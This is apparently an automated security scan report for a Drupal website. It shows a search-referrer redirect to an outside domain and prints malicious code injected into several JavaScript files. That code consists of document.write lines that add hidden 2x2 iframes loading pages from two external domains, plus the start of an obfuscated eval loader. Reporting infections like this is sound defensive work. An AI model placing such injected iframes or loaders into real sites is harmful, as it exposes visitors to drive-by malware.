Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://folkfreunde.de/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: folkfreunde.de Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=1209600 Connection: close Date: Thu, 28 Aug 2014 20:20:19 GMT Location: http://cooptraiss.com/hezd.html?h=559050 Server: Apache Vary: Accept-Encoding Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 11 Sep 2014 20:20:19 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://folkfreunde.de/ | 200 OK Content-Length: 5505 Content-Type: text/html | clean |
http://folkfreunde.de/user/register | 200 OK Content-Length: 6949 Content-Type: text/html | clean |
http://folkfreunde.de/misc/jquery.js?x | 200 OK Content-Length: 31352 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050></iframe>'); eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};i Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=559050 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=559050 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050> | ||
http://folkfreunde.de/misc/drupal.js?x | 200 OK Content-Length: 10097 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050></iframe>'); var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} }; Drupal.jsEnabled = document.getElementsByTa } return message; } if (Drupal.jsEnabled) { $(document.documentElement).addClass('js'); document.cookie = 'has_js=1; path=/'; $(document).ready(function() { Drupal.attachBehaviors(this); }); } Drupal.theme.prototype = { placeholder: function(str) { return '<em>' + Drupal.checkPlain(str) + '</em>'; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=559050 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=559050 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050> | ||
http://folkfreunde.de/sites/default/files/languages/de_06718c61422adac0e3e00259fc4af339.js?x | 200 OK Content-Length: 354 Content-Type: application/javascript | clean |
http://folkfreunde.de/modules/user/user.js?x | 200 OK Content-Length: 7295 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050></iframe>'); Drupal.behaviors.password = function(context) { var translate = Drupal.settings.password; $("input.password-field:not(.pass var offset = new Date().getTimezoneOffset() * -60; $("#edit-date-default-timezone, #edit-user-register-timezone").val(offset); }; Drupal.behaviors.userSettings = function (context) { $('div.user-admin-picture-radios input[type=radio]:not(.userSettings-processed)', context).addClass('userSettings-processed').click(function () { $('div.user-admin-picture-settings', context)[['hide', 'show'][this.value]](); }); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=559050 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=559050 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050> | ||
http://folkfreunde.de/user | 200 OK Content-Length: 5062 Content-Type: text/html | clean |
http://folkfreunde.de/user/password | 200 OK Content-Length: 4724 Content-Type: text/html | clean |
http://folkfreunde.de/test404page.js | 404 Not Found Content-Length: 3681 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=folkfreunde.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://folkfreunde.de/
Result: folkfreunde.de is not infected or malware details are not published yet.
Result: folkfreunde.de is not infected or malware details are not published yet.